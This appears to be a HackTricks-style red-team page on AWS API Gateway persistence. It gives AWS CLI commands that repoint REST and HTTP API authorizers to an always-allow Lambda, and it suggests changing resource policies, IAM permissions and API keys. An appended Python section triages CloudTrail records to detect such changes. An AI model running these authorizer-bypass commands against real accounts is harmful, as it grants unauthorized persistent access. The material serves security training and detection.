AWS - API Gateway Persistence

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

API Gateway

For more information go to:

AWS - API Gateway Enum

Resource Policy

Modify the resource policy of the API gateway(s) to grant yourself access to them.

Modify Lambda Authorizers

Modify the code of the Lambda authorizers to grant yourself access to all the endpoints.
Or just remove the use of the authorizer.

If you have control-plane permissions to create/update an authorizer (REST API: aws apigateway update-authorizer, HTTP API: aws apigatewayv2 update-authorizer) you can also repoint the authorizer to a Lambda that always allows.

REST APIs (changes typically require a deployment):

REGION="us-east-1"
REST_API_ID="<rest_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"

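# REST API authorizers are modified through patch operations (there is no --authorizer-uri flag here)
aws apigateway update-authorizer --region "$REGION" --rest-api-id "$REST_API_ID" --authorizer-id "$AUTHORIZER_ID" --patch-operations op=replace,path=/authorizerUri,value="$AUTHORIZER_URI"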
aws apigateway create-deployment --region "$REGION" --rest-api-id "$REST_API_ID" --stage-name "<stage>"

HTTP APIs / apigatewayv2 (often takes effect immediately):

REGION="us-east-1"
API_ID="<http_api_id>"
AUTHORIZER_ID="<authorizer_id>"
LAMBDA_ARN="arn:aws:lambda:$REGION:<account_id>:function:<always_allow_authorizer>"
AUTHORIZER_URI="arn:aws:apigateway:$REGION:lambda:path/2015-03-31/functions/$LAMBDA_ARN/invocations"

aws apigatewayv2 update-authorizer --region "$REGION" --api-id "$API_ID" --authorizer-id "$AUTHORIZER_ID" --authorizer-uri "$AUTHORIZER_URI"

IAM Permissions

If a resource is using an IAM authorizer, you could grant yourself access to it by changing IAM permissions.
Or just remove the use of the authorizer.

API Keys

If API keys are used, you could leak them to maintain persistence or even create new ones.
Or just remove the use of API keys.
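
From the defender's side, every change described on this page is an API Gateway control-plane call that CloudTrail records. The following is an added example (not part of the original page) that triages such records and flags an authorizer repointed to a Lambda outside an approved list; the approved ARN, the account ID and the sample records are constructed, and the `requestParameters` layout is an assumption, which is why the code searches it recursively.

```python
import re

# API Gateway control-plane calls that correspond to the changes described above.
WATCHED = {
    "UpdateAuthorizer": "authorizer reconfigured",
    "DeleteAuthorizer": "authorizer removed",
    "UpdateMethod": "REST method authorization changed",
    "UpdateRoute": "HTTP route authorization changed",
    "UpdateRestApi": "REST API settings or resource policy changed",
    "CreateApiKey": "new API key created",
}
# Assumption: Lambda authorizers your team has approved (constructed ARN).
APPROVED = {"arn:aws:lambda:us-east-1:111122223333:function:prod-authorizer"}
LAMBDA_IN_URI = re.compile(r"functions/(arn:aws:lambda:[^/]+)/invocations")

def find_lambda_arns(node):
    """Walk requestParameters recursively; REST and HTTP APIs nest the URI differently."""
    if isinstance(node, str):
        return LAMBDA_IN_URI.findall(node)
    if isinstance(node, dict):
        node = list(node.values())
    if isinstance(node, list):
        return [arn for child in node for arn in find_lambda_arns(child)]
    return []

def triage(events):
    findings = []
    for ev in events:
        name = ev.get("eventName")
        if ev.get("eventSource") != "apigateway.amazonaws.com" or name not in WATCHED:
            continue
        unapproved = [a for a in find_lambda_arns(ev.get("requestParameters") or {})
                      if a not in APPROVED]
        findings.append({"event": name, "why": WATCHED[name],
                         "actor": ev.get("userIdentity", {}).get("arn"), "unapproved_lambda": unapproved,
                         "severity": "high" if unapproved or name == "DeleteAuthorizer" else "review"})
    return findings

# Constructed, simplified CloudTrail records (not real log data).
URI = "arn:aws:apigateway:us-east-1:lambda:path/2015-03-31/functions/{}/invocations"
ROGUE = "arn:aws:lambda:us-east-1:111122223333:function:always-allow"
SRC = "apigateway.amazonaws.com"
SAMPLE_EVENTS = [
    {"eventSource": SRC, "eventName": "UpdateAuthorizer", "userIdentity": {"arn": "arn:aws:iam::111122223333:user/dev"},
     "requestParameters": {"patchOperations": [{"op": "replace", "path": "/authorizerUri", "value": URI.format(ROGUE)}]}},
    {"eventSource": SRC, "eventName": "UpdateAuthorizer", "requestParameters": {"authorizerUri": URI.format(next(iter(APPROVED)))}},
    {"eventSource": SRC, "eventName": "CreateApiKey", "requestParameters": None},
    {"eventSource": "s3.amazonaws.com", "eventName": "PutObject"},
]
```

Calling `triage(SAMPLE_EVENTS)` returns three findings; only the first, which points the authorizer at the unapproved function, is rated `high`.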